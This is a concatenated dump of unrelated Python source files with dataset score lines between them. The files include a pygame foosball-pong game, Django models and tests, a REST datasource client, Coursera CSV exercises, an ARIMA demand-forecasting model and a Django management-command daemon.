Provides better assessment the risk of the incident. The results contain whether or not it's a critical
application and a url link to the application on the AlgoSec BusinessFlow dashboard.
"""
return self.run_login(kwargs)
def _logic(self, algosec_hostname):
"""The @function decorator offerend by resilient circuits is impossible to unit test..."""
client = self.algosec.business_flow()
logger.info("algosec_hostname: %s", algosec_hostname)
# PUT YOUR FUNCTION IMPLEMENTATION CODE HERE
yield StatusMessage("starting...")
associated_applications = [
{
'artifact_ip': algosec_hostname,
'application_name': app_json['name'],
'is_critical': client.is_application_critical(app_json),
'businessflow_dashboard': '<a href="{}">{}</a>'.format(
client.get_abf_application_dashboard_url(app_json['revisionID']),
app_json['name']
),
}
for app_json in client.get_associated_applications(algosec_hostname)
]
results = {
'success': True,
'entries': associated_applications
}
yield StatusMessage("done...")
# Produce a FunctionResult with the results
yield FunctionResult(results)
| 2.171875 | 2 |
acumoscommon/services/datasource_service.py | acumos/model-builder-h2o-model-builder | 0 | 12757427 | <reponame>acumos/model-builder-h2o-model-builder
#!/usr/bin/env python3
#
# ===============LICENSE_START=======================================================
# Acumos
# ===================================================================================
# Copyright (C) 2018 AT&T Intellectual Property. All rights reserved.
# ===================================================================================
# This Acumos software file is distributed by AT&T
# under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============LICENSE_END=========================================================
import requests
from logging import getLogger
logger = getLogger(__name__)
API_VERSION = 'v2'
CONTENTS_RESOURCE = 'datasources'
class DatasourceServiceException(Exception):
def __init__(self, body, status_code, message=None):
self.body = body
self.status_code = status_code
if message is None:
message = f'DatasourceServiceException: Status code: {status_code}. Response Body: {body}'
super().__init__(message)
class DatasourceService:
def __init__(self, endpoint, verify_ssl=True):
self.endpoint = endpoint
self.headers = {
}
self.verify_ssl = verify_ssl
def get_datasource_contents(self, datasource_key):
endpoint = f'{self.endpoint}/{API_VERSION}/{CONTENTS_RESOURCE}/{datasource_key}/contents'
response = requests.get(endpoint, headers=self.headers, verify=self.verify_ssl)
logger.debug('Status code: {}'.format(response.status_code))
if response.status_code != 200:
text = response.text
raise DatasourceServiceException(text, response.status_code)
return response.text
def get_datasource_details(self, datasource_key):
endpoint = f'{self.endpoint}/{API_VERSION}/{CONTENTS_RESOURCE}/{datasource_key}'
response = requests.get(endpoint, headers=self.headers, verify=self.verify_ssl)
logger.debug('Status code: {}'.format(response.status_code))
if response.status_code != 200:
text = response.text
raise DatasourceServiceException(text, response.status_code)
return response.text
def post_write_content(self, datasource_key, request_body):
endpoint = f'{self.endpoint}/{API_VERSION}/{CONTENTS_RESOURCE}/{datasource_key}/prediction'
response = requests.post(endpoint, data=request_body, headers=self.headers, verify=self.verify_ssl)
logger.debug('Status code: {}'.format(response.status_code))
if response.status_code != 200:
text = response.text
raise DatasourceServiceException(text, response.status_code)
return response.text
| 1.523438 | 2 |
Coursera/Google_IT_Automation_with_Python/02_Using_Python_to_Interact_with_the_Operating_System/Week_2/wk2_mod3_pquiz.py | ssolomon2020/Self_Study_Python_Training | 0 | 12757428 | # Specialization: Google IT Automation with Python
# Course 02: Using Python to Interact with the Operating System
# Week 2 Module Part 3 - Practice Quiz
# Student: <NAME>
# Learning Platform: Coursera.org
# Scripting examples encountered during the Module Part 3 Practice Quiz:
# 01. We're working with a list of flowers and some information about each one.
# The create_file function writes this information to a CSV file. The contents_of_file
# function reads this file into records and returns the information in a nicely formatted
# block. Fill in the gaps of the contents_of_file function to turn the data in the CSV
# file into a dictionary using DictReader.
# import os
# import csv
#
# # Create a file with data in it
# def create_file(filename):
# with open(filename, "w") as file:
# file.write("name,color,type\n")
# file.write("carnation,pink,annual\n")
# file.write("daffodil,yellow,perennial\n")
# file.write("iris,blue,perennial\n")
# file.write("poinsettia,red,perennial\n")
# file.write("sunflower,yellow,annual\n")
#
# # Read the file contents and format the information about each row
# def contents_of_file(filename):
# return_string = ""
#
# # Call the function to create the file
# create_file(filename)
#
# # Open the file
# ___
# # Read the rows of the file into a dictionary
# ___
# # Process each item of the dictionary
# for ___:
# return_string += "a {} {} is {}\n".format(row["color"], row["name"], row["type"])
# return return_string
#
# #Call the function
# print(contents_of_file("flowers.csv"))
import os
import csv
# Create a file with data in it
def create_file(filename):
with open(filename, "w") as file:
file.write("name,color,type\n")
file.write("carnation,pink,annual\n")
file.write("daffodil,yellow,perennial\n")
file.write("iris,blue,perennial\n")
file.write("poinsettia,red,perennial\n")
file.write("sunflower,yellow,annual\n")
# Read the file contents and format the information about each row
def contents_of_file(filename):
return_string = ""
# Call the function to create the file
create_file(filename)
# Open the file
with open(filename, "r") as csv_file:
csv_reader = csv.DictReader(csv_file)
# Read the rows of the file into a dictionary
for row in csv_reader:
# Process each item of the dictionary
return_string += "a {} {} is {}\n".format(row["color"], row["name"], row["type"])
return return_string
#Call the function
print(contents_of_file("flowers.csv"))
# 02. Using the CSV file of flowers again, fill in the gaps of the contents_of_file
# function to process the data without turning it into a dictionary. How do you skip
# over the header record with the field names?
# import os
# import csv
#
# # Create a file with data in it
# def create_file(filename):
# with open(filename, "w") as file:
# file.write("name,color,type\n")
# file.write("carnation,pink,annual\n")
# file.write("daffodil,yellow,perennial\n")
# file.write("iris,blue,perennial\n")
# file.write("poinsettia,red,perennial\n")
# file.write("sunflower,yellow,annual\n")
#
# # Read the file contents and format the information about each row
# def contents_of_file(filename):
# return_string = ""
#
# # Call the function to create the file
# create_file(filename)
#
# # Open the file
# ___
# # Read the rows of the file
# rows = ___
# # Process each row
# for row in rows:
# ___ = row
# # Format the return string for data rows only
#
# return_string += "a {} {} is {}\n".format(___)
# return return_string
#
# #Call the function
# print(contents_of_file("flowers.csv"))
import os
import csv
# Create a file with data in it
def create_file(filename):
with open(filename, "w") as file:
file.write("name,color,type\n")
file.write("carnation,pink,annual\n")
file.write("daffodil,yellow,perennial\n")
file.write("iris,blue,perennial\n")
file.write("poinsettia,red,perennial\n")
file.write("sunflower,yellow,annual\n")
# Read the file contents and format the information about each row
def contents_of_file(filename):
return_string = ""
# Call the function to create the file
create_file(filename)
# Open the file
with open(filename, "r") as csv_file:
reader = csv.reader(csv_file)
# Read the rows of the file
rows = reader
# Process each row
for row in rows:
name, color, typ = row
# Format the return string for data rows only
if name != "name":
return_string += "a {} {} is {}\n".format(color, name, typ)
return return_string
#Call the function
print(contents_of_file("flowers.csv")) | 4.78125 | 5 |
foosPong.py | sahasukanta/foosPong-repo | 0 | 12757429 | <filename>foosPong.py
import pygame
def main():
pygame.init()
# making the main window screen
size = (1280,720)
screen = pygame.display.set_mode(size)
# window title
title = "Pong"
pygame.display.set_caption(title)
# window icon
icon = pygame.image.load("pong_ball.png")
pygame.display.set_icon(icon)
game = Game(screen)
game.play()
class Line:
def __init__(self, start, end, width, color, screen):
self.start = start
self.end = end
self.width = width
self.color = color
self.screen = screen
def draw(self):
pygame.draw.line(self.screen, self.color, self.start, self.end, self.width)
class Ellipse:
def __init__(self, rect_left, rect_top, rect_width, rect_height, screen):
self.rect_left = rect_left
self.rect_top = rect_top
self.rect_width = rect_width
self.rect_height = rect_height
self.screen = screen
def draw(self, width):
rect = pygame.Rect(self.rect_left, self.rect_top, self.rect_width, self.rect_height)
pygame.draw.ellipse(self.screen, pygame.Color("white"), rect, width)
class Paddle:
def __init__(self, left, top, width, height, velocity, color, screen):
# dimensions
self.left = left
self.top = top
self.width = width
self.height = height
self.bottom = self.top + self.height
self.middle = self.left + self.width/2
self.right = self.left + self.width
# others
self.velocity = velocity
self.color = color
self.screen = screen
def draw(self):
# draws the paddle rect onto the display
self.rect = pygame.Rect(self.left, self.top, self.width, self.height)
pygame.draw.rect(self.screen, self.color, self.rect)
def bound_check(self):
# stops the pads from going out of the display through the y axis
if self.top > self.screen.get_height()-self.height:
self.top = self.screen.get_height()-self.height
if self.top < 0:
self.top = 0
class Ball:
def __init__(self, dot_radius, dot_center, dot_velocity, dot_color, screen):
self.radius = dot_radius
self.center = dot_center
self.left = self.center[0] - self.radius
self.right = self.center[0] + self.radius
self.color = dot_color
self.screen = screen
self.velocity = dot_velocity
def draw(self):
pygame.draw.circle(self.screen, self.color, self.center, self.radius)
def move(self):
# moves the ball across the display
# keeps the ball within the display
display_width, display_height = self.screen.get_size()
# boundary checking
if self.center[0] > display_width:
self.velocity[0] *= -1
if self.center[0] < 0:
self.velocity[0] *= -1
if self.center[1] > display_height:
self.velocity[1] *= -1
if self.center[1] < 0:
self.velocity[1] *= -1
# updating position of center
self.center[0] += self.velocity[0]
self.center[1] += self.velocity[1]
class Game:
# main game class
def __init__(self, game_screen):
# --- attributes general to all games
self.x_min = 0
self.y_min = 0
self.x_max = 1280
self.y_max = 720
self.screen = game_screen
self.background_color = pygame.Color("black")
self.game_clock = pygame.time.Clock()
self.fps = 120
self.continue_game = True
self.close_clicked = False
# creating the paddle objects
left_pad_left = self.x_min + 100
left_pad_top = self.y_min + 280
left_pad_width = 10
left_pad_height = 120
left_pad_velocity = 0
left_pad_color = pygame.Color("orangered")
self.left_pad = Paddle(left_pad_left, left_pad_top, left_pad_width, left_pad_height, left_pad_velocity, left_pad_color, self.screen)
left_pad_2_left = self.x_min + 300
left_pad_2_top = self.y_min + 280
left_pad_2_width = 10
left_pad_2_height = 120
left_pad_2_velocity = 0
left_pad_2_color = pygame.Color("orangered")
self.left_pad_2 = Paddle(left_pad_2_left, left_pad_2_top, left_pad_2_width, left_pad_2_height, left_pad_2_velocity, left_pad_2_color, self.screen)
right_pad_left = self.x_max - 120
right_pad_top = 280
right_pad_width = 10
right_pad_height = 120
right_pad_velocity = 0
right_pad_color = pygame.Color("chartreuse")
self.right_pad = Paddle(right_pad_left, right_pad_top, right_pad_width, right_pad_height, right_pad_velocity, right_pad_color, self.screen)
right_pad_2_left = 960
right_pad_2_top = 280
right_pad_2_width = 10
right_pad_2_height = 120
right_pad_2_velocity = 0
right_pad_2_color = pygame.Color("chartreuse")
self.right_pad_2 = Paddle(right_pad_2_left, right_pad_2_top, right_pad_2_width, right_pad_2_height, right_pad_2_velocity, right_pad_2_color, self.screen)
# creating the ball object
dot_radius = 5
dot_center = [450,300]
dot_color = pygame.Color("aquamarine")
dot_velocity = [4,4]
self.ball = Ball(dot_radius, dot_center, dot_velocity, dot_color, self.screen)
# creating line objects
midline_start = (640,0)
midline_end = (640,720)
midline_width = 3
midline_color = pygame.Color("white")
self.midline = Line(midline_start, midline_end, midline_width, midline_color, self.screen)
# right goal lines
right_goalline_start = (1258,280)
right_goalline_end = (1258,400)
right_goalline_width = 3
right_goalline_color = pygame.Color("white")
self.right_goalline = Line(right_goalline_start, right_goalline_end, right_goalline_width, right_goalline_color, self.screen)
right_goalline_A_start = (1258,280)
right_goalline_A_end = (1280,250)
right_goalline_A_width = 3
right_goalline_A_color = pygame.Color("white")
self.right_goalline_A = Line(right_goalline_A_start, right_goalline_A_end, right_goalline_A_width, right_goalline_A_color, self.screen)
right_goalline_B_start = (1258,400)
right_goalline_B_end = (1280,430)
right_goalline_B_width = 3
right_goalline_B_color = pygame.Color("white")
self.right_goalline_B = Line(right_goalline_B_start, right_goalline_B_end, right_goalline_B_width, right_goalline_B_color, self.screen)
# left goal lines
left_goalline_start = (20,280)
left_goalline_end = (20,400)
left_goalline_width = 3
left_goalline_color = pygame.Color("white")
self.left_goalline = Line(left_goalline_start, left_goalline_end, left_goalline_width, left_goalline_color, self.screen)
left_goalline_A_start = (20,280)
left_goalline_A_end = (0,250)
left_goalline_A_width = 3
left_goalline_A_color = pygame.Color("white")
self.left_goalline_A = Line(left_goalline_A_start, left_goalline_A_end, left_goalline_A_width, left_goalline_A_color, self.screen)
left_goalline_B_start = (20,400)
left_goalline_B_end = (0,430)
left_goalline_B_width = 3
left_goalline_B_color = pygame.Color("white")
self.left_goalline_B = Line(left_goalline_B_start, left_goalline_B_end, left_goalline_B_width, left_goalline_B_color, self.screen)
rect_left = 590
rect_top = 295
rect_width = 100
rect_height = 100
self.center_ellipse = Ellipse(rect_left, rect_top, rect_width, rect_height, self.screen)
# setting initial score
self.left_pad_score = 0
self.right_pad_score = 0
def handle_events(self):
# cross click event
# key down and up events
# implementing the bound check method of paddles
for event in pygame.event.get():
# close game event
if event.type == pygame.QUIT:
self.close_clicked = True
# left pad events
if event.type == pygame.KEYDOWN:
# left pad 1 key down events
if event.key == pygame.K_a:
self.left_pad.velocity = 4
if event.key == pygame.K_q:
self.left_pad.velocity = -4
# left pad 2 key down events
if event.key == pygame.K_d:
self.left_pad_2.velocity = 4
if event.key == pygame.K_e:
self.left_pad_2.velocity = -4
if event.type == pygame.KEYUP:
# left pad key down events
if event.key == pygame.K_a:
self.left_pad.velocity = 0
if event.key == pygame.K_q:
self.left_pad.velocity = 0
# left pad 2 key down events
if event.key == pygame.K_d:
self.left_pad_2.velocity = 0
if event.key == pygame.K_e:
self.left_pad_2.velocity = 0
# righ pad events
if event.type == pygame.KEYDOWN:
# right pad key down events
if event.key == pygame.K_l:
self.right_pad.velocity = 4
if event.key == pygame.K_p:
self.right_pad.velocity = -4
if event.key == pygame.K_j:
self.right_pad_2.velocity = 4
if event.key == pygame.K_i:
self.right_pad_2.velocity = -4
if event.type == pygame.KEYUP:
# right pad key down events
if event.key == pygame.K_l:
self.right_pad.velocity = 0
if event.key == pygame.K_p:
self.right_pad.velocity = 0
# right pad 2 key down events
if event.key == pygame.K_j:
self.right_pad_2.velocity = 0
if event.key == pygame.K_i:
self.right_pad_2.velocity = 0
# both right and left pads keydown at the same time:
# updating pad y (top) point
self.left_pad.top += self.left_pad.velocity
self.left_pad_2.top += self.left_pad_2.velocity
self.right_pad.top += self.right_pad.velocity
self.right_pad_2.top += self.right_pad_2.velocity
self.left_pad.bound_check()
self.right_pad.bound_check()
def draw(self):
# draws the pads and ball
# fill the screen with black
self.screen.fill(self.background_color)
# draws all game objects to screen
self.left_pad.draw()
self.left_pad_2.draw()
self.right_pad.draw()
self.right_pad_2.draw()
self.ball.draw()
self.midline.draw()
self.right_goalline.draw()
self.right_goalline_A.draw()
self.right_goalline_B.draw()
self.left_goalline.draw()
self.left_goalline_A.draw()
self.left_goalline_B.draw()
self.center_ellipse.draw(3)
# pygame.display.flip()
def collide(self):
collision = True
if collision == True:
if self.left_pad.rect.collidepoint(self.ball.center) or self.left_pad_2.rect.collidepoint(self.ball.center):
self.ball.velocity[0] *= -1
if collision == True:
if self.right_pad.rect.collidepoint(self.ball.center) or self.right_pad_2.rect.collidepoint(self.ball.center):
self.ball.velocity[0] *= -1
def score(self):
# updates the score
display_width = self.screen.get_width()
if self.ball.center[0] > display_width:
self.left_pad_score += 1
if self.left_goalline_A.end[1] <= self.ball.center[1] <= self.left_goalline_B.end[1]:
self.left_pad_score += 1
if self.ball.center[0] < 0:
self.right_pad_score += 1
if self.right_goalline_A.end[1] <= self.ball.center[1] <= self.right_goalline_B.end[1]:
self.right_pad_score += 1
# if self.left_goalline_A.end[1] <= self.ball.center[1] <= self.left_goalline_B.end[1]:
# self.left_pad_score += 1
def display_score(self):
# displays the updates scores
right_text = str(self.right_pad_score)
left_text = str(self.left_pad_score)
right_text_pos = (1210,25)
left_text_pos = (30,25)
text_color = pygame.Color("white")
text_font = pygame.font.SysFont('freesansbold.ttf', 64)
right_text_image = text_font.render(right_text, True, text_color)
left_text_image = text_font.render(left_text, True, text_color)
self.screen.blit(right_text_image, right_text_pos)
self.screen.blit(left_text_image, left_text_pos)
pygame.display.flip()
def check_continue(self):
# checks for max points limit (11) and if game should continue
if self.left_pad_score >= 18 or self.right_pad_score >= 18: # point limit set to 18
self.continue_game = False
def update(self):
# updates ball movement and score
self.ball.move()
self.score()
def play(self):
# main gameplay method
while not self.close_clicked:
self.handle_events()
self.draw()
self.display_score()
self.check_continue() # for ending game automatically after a certain score is reached by either of the players
if self.continue_game:
self.collide()
self.update()
self.game_clock.tick(self.fps)
main()
| 3.5 | 4 |
tests/software_tests/message/test_nrc.py | mdabrowski1990/uds | 18 | 12757430 | <gh_stars>10-100
import pytest
from uds.message.nrc import NRC, \
ByteEnum, ValidatedEnum, ExtendableEnum
class TestNRC:
"""Unit tests for 'NRC' enum"""
def test_inheritance__byte_enum(self):
assert issubclass(NRC, ByteEnum)
def test_inheritance__validated_enum(self):
assert issubclass(NRC, ValidatedEnum)
def test_inheritance__extendable_enum(self):
assert issubclass(NRC, ExtendableEnum)
@pytest.mark.integration
class TestNRCIntegration:
"""Integration tests for NRC class."""
SPECIFIC_CONDITIONS_NOT_CORRECT_VALUES = range(0x95, 0xF0)
SYSTEM_SPECIFIC_VALUES = range(0xF0, 0xFF)
@pytest.mark.parametrize("undefined_value", list(SPECIFIC_CONDITIONS_NOT_CORRECT_VALUES) + list(SYSTEM_SPECIFIC_VALUES))
def test_undefined_value(self, undefined_value):
assert NRC.is_member(undefined_value) is False
| 2.375 | 2 |
examples/models.py | Nielssie/django-funky-sheets | 82 | 12757431 | from django.db import models
class Genre(models.Model):
name = models.CharField(max_length=16, null=True)
def __str__(self):
return self.name
class Director(models.Model):
name = models.CharField(max_length=64, null=True)
def __str__(self):
return self.name
class Country(models.Model):
name = models.CharField(max_length=64, null=True)
class Meta:
verbose_name_plural = 'countries'
def __str__(self):
return self.name
class Movie(models.Model):
# String fields
title = models.CharField(max_length=64, null=True)
imdb_link = models.URLField(null=True)
# Number field
imdb_rating = models.DecimalField(max_digits=2, decimal_places=1, null=True)
# Boolean field
parents_guide = models.BooleanField(default=False, null=True)
# Date field
release_date = models.DateField(null=True)
# Relationship fields
director = models.ForeignKey(Director, null=True, on_delete=models.CASCADE)
country = models.ForeignKey(Country, null=True, on_delete=models.CASCADE)
genre = models.ManyToManyField(Genre)
def __str__(self):
return self.title
| 2.28125 | 2 |
polecat/jsonapi/lateral/list.py | furious-luke/polecat | 4 | 12757432 | from ..list import List as ListBase
class List(ListBase):
""" Use laterals to compose a list query.
WITH ep0(included, type, id, fields) AS (
SELECT
'f',
'movies',
movies.id,
jsonb_build_array(movies.name, ep0_actors.values)
FROM movies
LIMIT 20
)
SELECT * FROM ep0
INNER JOIN LATERAL (
SELECT
't',
'people',
people.id,
jsonb_build_array(people.name, ep1_rented.values),
FROM people
WHERE people.id IN (SELECT value FROM jsonb_array_elements(
"""
def get_sql(self):
sql = getattr(self, '_sql', None)
if not sql:
self._aliases, self._subselects = self.get_components()
cte = self.get_cte(self._subselects)
main = self.get_main_select(self._aliases)
sql = f'{cte} {main}'
self._sql = sql
return sql
def
| 3.15625 | 3 |
lintcode/medium/majority_number_iii/py/majority_number_iii.py | lilsweetcaligula/Online-Judges | 0 | 12757433 | <filename>lintcode/medium/majority_number_iii/py/majority_number_iii.py
class Solution:
"""
@param nums: A list of integers
@param k: As described
@return: The majority number
"""
def majorityNumber(self, nums, k):
import collections
ratio = 1.0 / k * len(nums)
counter = collections.Counter(nums)
for num in counter:
count = counter[num]
if count > ratio:
return num
return None
| 3.59375 | 4 |
lab/tests/permissions/test_get_user_permission_group.py | betagouv/euphrosyne | 1 | 12757434 | <gh_stars>1-10
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.test.client import RequestFactory
from lab.models import Project
from ...permissions import LabRole, get_user_permission_group
class TestGetUserPermissionGroup(TestCase):
def setUp(self):
request_factory = RequestFactory()
self.request = request_factory.get("/")
self.project = Project.objects.create(name="Test project")
def test_get_admin_user_permission(self):
admin_user = get_user_model().objects.create(
email="<EMAIL>", is_staff=True, is_lab_admin=True
)
self.request.user = admin_user
assert (
get_user_permission_group(self.request, self.project) == LabRole.LAB_ADMIN
)
def test_get_leader_permission(self):
leader_user = get_user_model().objects.create(
email="<EMAIL>", is_staff=True
)
self.project.participation_set.create(user=leader_user, is_leader=True)
self.request.user = leader_user
assert (
get_user_permission_group(self.request, self.project)
== LabRole.PROJECT_LEADER
)
def test_get_member_permission(self):
member_user = get_user_model().objects.create(
email="<EMAIL>", is_staff=True
)
self.project.participation_set.create(user=member_user)
self.request.user = member_user
assert (
get_user_permission_group(self.request, self.project)
== LabRole.PROJECT_MEMBER
)
def test_get_staff_user_permission(self):
staff_user = get_user_model().objects.create(
email="<EMAIL>", is_staff=True
)
self.request.user = staff_user
assert (
get_user_permission_group(self.request, self.project)
== LabRole.ANY_STAFF_USER
)
| 2.34375 | 2 |
ros/src/tl_detector/light_classification/helper.py | Horki/CarND-Capstone | 1 | 12757435 | <filename>ros/src/tl_detector/light_classification/helper.py
import cv2
import tensorflow as tf
def load_model(model_path, graph):
with graph.as_default():
graph_def = tf.GraphDef()
with tf.gfile.GFile(model_path, 'rb') as gf:
serial_g = gf.read()
graph_def.ParseFromString(serial_g)
tf.import_graph_def(graph_def, name='')
def process_image(image):
resized = cv2.resize(image, (300, 300))
img = cv2.cvtColor(resized, cv2.COLOR_BGR2RGB)
return img
| 2.484375 | 2 |
src/urban_meal_delivery/forecasts/models/tactical/realtime.py | webartifex/urban-meal-delivery | 1 | 12757436 | """Real-time forecasting `*Model`s to predict demand for tactical purposes.
Real-time `*Model`s take order counts of all time steps in the training data
and make a prediction for only one time step on the day to be predicted (i.e.,
the one starting at `predict_at`). Thus, the training time series have a
`frequency` of the number of weekdays, `7`, times the number of time steps on a
day. For example, for 60-minute time steps, the `frequency` becomes `7 * 12`
(= operating hours from 11 am to 11 pm), which is `84`. Real-time `*Model`s
train the forecasting `methods` on a seasonally decomposed time series internally.
""" # noqa:RST215
import datetime as dt
import pandas as pd
from urban_meal_delivery import db
from urban_meal_delivery.forecasts import methods
from urban_meal_delivery.forecasts.models import base
class RealtimeARIMAModel(base.ForecastingModelABC):
"""The ARIMA model applied on a real-time time series."""
name = 'rtarima'
def predict(
self, pixel: db.Pixel, predict_at: dt.datetime, train_horizon: int,
) -> pd.DataFrame:
"""Predict demand for a time step.
Args:
pixel: pixel in which the prediction is made
predict_at: time step (i.e., "start_at") to make the prediction for
train_horizon: weeks of historic data used to predict `predict_at`
Returns:
actual order counts (i.e., the "actual" column),
point forecasts (i.e., the "prediction" column), and
confidence intervals (i.e, the four "low/high/80/95" columns);
contains one row for the `predict_at` time step
# noqa:DAR401 RuntimeError
"""
# Generate the historic (and real-time) order time series.
training_ts, frequency, actuals_ts = self._order_history.make_realtime_ts(
pixel_id=pixel.id, predict_at=predict_at, train_horizon=train_horizon,
)
# Decompose the `training_ts` to make predictions for the seasonal
# component and the seasonally adjusted observations separately.
decomposed_training_ts = methods.decomposition.stl(
time_series=training_ts,
frequency=frequency,
# "Periodic" `ns` parameter => same seasonal component value
# for observations of the same lag.
ns=999,
)
# Make predictions for the seasonal component by linear extrapolation.
seasonal_predictions = methods.extrapolate_season.predict(
training_ts=decomposed_training_ts['seasonal'],
forecast_interval=pd.DatetimeIndex(actuals_ts.index),
frequency=frequency,
)
# Make predictions with the ARIMA model on the seasonally adjusted time series.
seasonally_adjusted_predictions = methods.arima.predict(
training_ts=(
decomposed_training_ts['trend'] + decomposed_training_ts['residual']
),
forecast_interval=pd.DatetimeIndex(actuals_ts.index),
# Because the seasonality was taken out before,
# the `training_ts` has, by definition, a `frequency` of `1`.
frequency=1,
seasonal_fit=False,
)
# The overall `predictions` are the sum of the separate predictions above.
# As the linear extrapolation of the seasonal component has no
# confidence interval, we put the one from the ARIMA model around
# the extrapolated seasonal component.
predictions = pd.DataFrame(
data={
'actual': actuals_ts,
'prediction': (
seasonal_predictions['prediction'] # noqa:WPS204
+ seasonally_adjusted_predictions['prediction']
),
'low80': (
seasonal_predictions['prediction']
+ seasonally_adjusted_predictions['low80']
),
'high80': (
seasonal_predictions['prediction']
+ seasonally_adjusted_predictions['high80']
),
'low95': (
seasonal_predictions['prediction']
+ seasonally_adjusted_predictions['low95']
),
'high95': (
seasonal_predictions['prediction']
+ seasonally_adjusted_predictions['high95']
),
},
index=actuals_ts.index,
)
# Sanity checks.
if len(predictions) != 1: # pragma: no cover
raise RuntimeError('real-time models should predict exactly one time step')
if predictions.isnull().sum().any(): # pragma: no cover
raise RuntimeError('missing predictions in rtarima model')
if predict_at not in predictions.index: # pragma: no cover
raise RuntimeError('missing prediction for `predict_at`')
return predictions
| 3.46875 | 3 |
scripts/management_daemon.py | uw-it-aca/django-container | 0 | 12757437 | #!/usr/bin/env python
import django
from django.core import management
from prometheus_client import start_http_server, Gauge
from croniter import croniter
from datetime import datetime
import time
import sys
import signal
import os
import re
import gc
#
# Run django management command on a continuous loop
# delaying "--delay <seconds>" between each invocation,
# and gracefully exiting on termination signal
#
def main():
signals = [signal.SIGHUP, signal.SIGINT, signal.SIGQUIT,
signal.SIGTERM, signal.SIGWINCH]
finish_signal = None
loop_delay = 15
cron_spec = None
command = None
options = []
our_arg = True
def report(message, error=False):
print("management command daemon: {}: {}".format(
command if command else sys.argv[1:], message),
file=sys.stderr if error else sys.stdout)
def abort(reason):
report(reason, error=True)
sys.exit(-1)
def finish_on_signal():
report("exit on signal ({})".format(finish_signal))
sys.exit(0)
def handler(signum, frame):
nonlocal finish_signal
if signum in signals:
finish_signal = signum
else:
report("signal {}".format(signum), error=True)
def pause(lastrun_utc):
delay = 0
if cron_spec:
c = croniter(cron_spec, datetime.utcfromtimestamp(lastrun_utc + 1))
delay = int(c.get_next() - lastrun_utc)
else:
delay = loop_delay - int(time.time() - lastrun_utc)
if delay > 0 and not finish_signal:
gc.collect()
time.sleep(delay)
# prepare to exit gracefully
for signum in signals:
signal.signal(signum, handler)
# prepare metrics
management_daemon_command_start = Gauge(
'management_daemon_command_start',
'Management Command start time',
['job', 'instance'])
management_daemon_command_finish = Gauge(
'management_daemon_command_finish',
'Management Command finish time',
['job', 'instance'])
management_daemon_command_duration = Gauge(
'management_daemon_command_duration',
'Management Command curation',
['job', 'instance'])
management_daemon_command_exit = Gauge(
'management_daemon_command_exit',
'Management Command return value',
['job', 'instance'])
# parse our args from command's
for arg in sys.argv[1:]:
if our_arg:
if not loop_delay:
if not re.match('^[0-9]+$', arg):
abort('invalid loop delay')
loop_delay = int(arg)
elif cron_spec is not None and len(cron_spec) == 0:
if not croniter.is_valid(arg):
abort("invalid cron specification")
cron_spec = arg
elif arg == '--delay':
loop_delay = None
elif arg == '--cron':
cron_spec = ""
elif arg == '--':
our_arg = False
else:
command = arg
our_arg = False
elif not command:
command = arg
our_arg = False
else:
options.append(arg)
if command is None:
abort('missing command')
if not loop_delay:
abort('missing delay')
# open metrics exporter endpoint
start_http_server(9100)
if cron_spec:
if len(cron_spec) == 0:
abort('missing cron specification')
# initial pause
pause(time.time())
release_id = os.getenv('RELEASE_ID', None)
if not release_id:
m = re.match(r'(.+?)-daemon-.+$', os.getenv('HOSTNAME', ''))
release_id = m.group(1) if m else 'default'
# initialize django
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'project.settings')
django.setup()
# run provided management command in a loop
while True:
if finish_signal:
finish_on_signal()
start = time.time()
rv = -1
try:
rv = management.call_command(command, *options)
except SystemExit as ex:
rv = int(str(ex))
except Exception as ex:
rv = -1
report("exception: {}".format(ex), error=True)
finish = time.time()
duration = finish - start
management_daemon_command_exit.labels(
command, release_id).set(rv if rv and isinstance(rv, int) else 0)
management_daemon_command_start.labels(
command, release_id).set(start)
management_daemon_command_finish.labels(
command, release_id).set(finish)
management_daemon_command_duration.labels(
command, release_id).set(duration)
pause(start)
if __name__ == '__main__':
main()
| 2.125 | 2 |
c2_python-operating-system/5_testing-in-python/_scripts/validations.py | DrShams/google-it-automation | 0 | 12757438 | #!/usr/bin/python3
def validate_user(name, minlen):
assert type(name) == str, "username must be a string"
if minlen < 1:
raise ValueError("minlen must be at least 1")
if len(name) < minlen:
return False
if not name .isalnum():
return False
return True
#LAB
#1
my_list = [27, 5, 9, 6, 8]
def RemoveValue(myVal):
if myVal not in my_list:
raise ValueError("Value must be in the given list")
else:
my_list.remove(myVal)
return my_list
print("1",RemoveValue(27))
#print("2",RemoveValue(27))
#2
my_word_list = ['east', 'after', 'up', 'over', 'inside']
def OrganizeList(myList):
for item in myList:
assert type(item) == str, "Word list must be a list of strings"
myList.sort()
return myList
my_new_list = [6, 3, 8, "12", 42]
#print(OrganizeList(my_new_list))
#without assert
#TypeError: '<' not supported between instances of 'str' and 'int'
#3
import random
participants = ['Jack','Jill','NotLarry','Tom']
# Revised Guess() function
def Guess(participants):
my_participant_dict = {}
for participant in participants:
my_participant_dict[participant] = random.randint(1, 9)
try:
if my_participant_dict['Larry'] == 9:
return True
else:
return False
except KeyError:
return None
print(Guess(participants))
| 3.828125 | 4 |
metal_python/models/v1_machine_register_request.py | metal-stack/metal-python | 7 | 12757439 | <reponame>metal-stack/metal-python
# coding: utf-8
"""
metal-api
API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501
OpenAPI spec version: v0.15.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class V1MachineRegisterRequest(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'bios': 'V1MachineBIOS',
'hardware': 'V1MachineHardwareExtended',
'ipmi': 'V1MachineIPMI',
'partitionid': 'str',
'rackid': 'str',
'tags': 'list[str]',
'uuid': 'str'
}
attribute_map = {
'bios': 'bios',
'hardware': 'hardware',
'ipmi': 'ipmi',
'partitionid': 'partitionid',
'rackid': 'rackid',
'tags': 'tags',
'uuid': 'uuid'
}
def __init__(self, bios=None, hardware=None, ipmi=None, partitionid=None, rackid=None, tags=None, uuid=None): # noqa: E501
